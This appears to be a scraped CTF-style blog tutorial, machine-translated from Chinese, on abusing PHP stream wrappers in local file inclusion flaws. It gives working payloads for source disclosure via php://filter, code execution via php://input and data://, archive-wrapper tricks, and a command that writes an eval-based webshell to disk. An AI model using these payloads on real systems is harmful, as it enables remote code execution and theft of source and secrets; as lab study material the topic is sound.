当前位置:网站首页>PHP pseudo protocol for command execution
PHP pseudo protocol for command execution
2022-07-19 02:37:00 【jjj34】
Reference link :PHP Pseudo protocol summary - SegmentFault Think no
Catalog
4.zip:// & bzip:// & zlib:// agreement
1.file:// agreement
Conditions :
allow_url_fopen : off/on
allow_url_include: off/oneffect :
Used to access the local file system , stay ctf Is usually used to read local files
stay include() / require() / include_once() / require_once() The parameters are controllable , Even if import is not .php file , Such as shell.txt , Still, in accordance with the php Grammar for parsing , This is a include() Function
explain :
file:// The file system is php Default encapsulation protocol used , Used to show the local file system .
usage
/path/to/file.ext
relative/path/to/file.ext
fileInCwd.ext
C:/path/to/winfile.ext
C:\path\to\winfile.ext
\\smbserver\share\path\to\winfile.ext
file:///path/to/file.extExample :
1.file://[ The absolute path and filename of the file ]
http://127.0.0.1/include.php?file=file://E:\phpStudy\PHPTutorial\WWW\phpinfo.txt2.file://[ Relative path and file name of the file ]
http://127.0.0.1/include.php?file=./phpinfo.txt3.http:// Network location and file name
http://127.0.0.1/include.php?file=http://127.0.0.1/phpinfo.txt2.php:// agreement
Conditions
allow_url_open : off/on
allow_url_include: only php://input php://stdin php://memory php://temp need oneffect :
php:// Access individual inputs / Output stream (I/O streams), stay ctf Often used in php://filter and php://input
php://filter For reading source code
php://input Used to perform php Code explain
php Some miscellaneous inputs are provided / Output (IO) flow , allow access to PHP Of I / O stream , Standard I / O streams and error descriptors
php://filter Use
php://filter/read=convert.base64-encode/resource=[ file name ]php://input Use
http://127.0.0.1/include.php?file=php://input
[POST DATA part ]
<?php phpinfo(); ?>Write a word Trojan
http://127.0.0.1/include.php?file=php://input
[POST DATA part ]
<?php fputs(fopen('1juhua.php','w'),'<?php @eval($_GET[cmd]); ?>'); ?>3.data:// agreement
effect :
php>=5.2.0 , have access to data:// Data flow wrapper , To transfer data in the corresponding format . Usually used to perform php Code
usage
data://text/plain, ???
Such as
http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>4.zip:// & bzip:// & zlib:// agreement
effect :
zip:// & bzip:// & zlib:// All belong to compressed flow , You can access sub files in a compressed file , More importantly, you don't need to specify a suffix , It can be modified to any suffix , Such as jpg,png,gif,xxx etc.
Example :
1.zip://[ Compressed file absolute path ]%23[ The name of the sub file in the compressed file ](# The code of is %23)
Compress phpinfo.txt by phpinfo.zip , Rename the package to phpinfo.jpg , And upload
http://127.0.0.1/include.php?file=zip://E:\phpStudy\PHPTutorial\WWW\phpinfo.jpg%23phpinfo.txt2.compress.bzip2://file.bz2
Compress phpinfo.txt by phpinfo.bz2 And upload ( Any suffix is also supported )
http://127.0.0.1/include.php?file=compress.bzip2://E:\phpStudy\PHPTutorial\WWW\phpinfo.bz23.compress.zlib://file.gz
Compress phpinfo.txt by phpinfo.gz And upload ( Supports any suffix )
http://127.0.0.1/include.php?file=compress.zlib://E:\phpStudy\PHPTutorial\WWW\phpinfo.gzsummary
stay ctf The most common ones in English are data:// , php://input , php://filter ,file://
php://input ,data:// To execute commands
1.php://input Usage of
http://127.0.0.1/include.php?file=php://input
[POST DATA part ]
<?php phpinfo(); ?>
2.data:// usage
http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>
php://filter,file:// Used to read files
3.php://filter usage
http://127.0.0.1/include.php?file=php://filter/read=convert.base64-encode/resource=phpinfo.php( Read php The file needs to be encrypted before it can be read out )
http://127.0.0.1/include.php?file=php://filter/resource=/flag
4.file:// usage
http://127.0.0.1/include.php?file=file://E:\phpStudy\PHPTutorial\WWW\phpinfo.txt边栏推荐
- Interview: the difference between interface and abstract class - concise summary
- bugku---game1
- Sword finger offer 53 - I. find the number I in the sorted array
- Detailed explanation of caduceus project of metauniverse public chain (I): project concept and technical framework of caduceus metaverse protocol
- CTFHub----RCE
- Performance test implementation specification Guide
- In depth performance test data analysis
- 剑指 Offer 53 - I. 在排序数组中查找数字 I
- Bugku problem solution
- Decentralized edge rendering meta universe protocol cadeus was invited to attend the cbaia 2022 summit to enable more Web3 application scenarios with technology
猜你喜欢
元宇宙公链Caduceus项目详解(一):Caduceus Metaverse Protocol的项目理念及技术框架
Jmeter接口测试之响应断言
postman的json脚本转jmeter的jmx脚本
Signal and system experiment
静态路由(详)
innodb、Mysql结构、三种删除的区别
Detailed explanation of caduceus project of metauniverse public chain (I): project concept and technical framework of caduceus metaverse protocol
![[unity Editor Extension] unity makes its own exclusive editor panel](/img/67/12a4ab5167d4a5fc2aaba5220c8df9.png)
[unity Editor Extension] unity makes its own exclusive editor panel
CTFHub----RCE
Buaaos-lab0 experimental report
随机推荐
[Ruiji takeout ⑩] rough learning of Linux & rough learning of redis
元宇宙公链Caduceus项目详解(一):Caduceus Metaverse Protocol的项目理念及技术框架
Network layer transmission protocol (detailed)
Inverse yuan (I'll add these words if there are too many people using the name)
Project Performance Optimization Practice: solve the white screen problem of the home page, customize the loading animation to optimize the first screen effect
STL -- set container
子网划分(详)
【AntV G2】如何解决 G2 造成的内存泄露
【瑞吉外卖⑩】Linux 粗略学习 & Redis 粗略学习
GoReplay
Jmeter响应时间测试组件&多接口并发
UE4 notes
Signal and system experiment
Full link voltage measurement
BeanShell script gets the current time
【Antv G2】折线图如何添加点击事件(点击任意位置即可获取折线上点的值)
简单的用例编写规范
Analysis of the paradise of metauniverse developers the ecological value of the metauniverse protocol caduceus
Logic vulnerability - login verification code security
怎么将软件的快捷方式添加到鼠标右键的列表中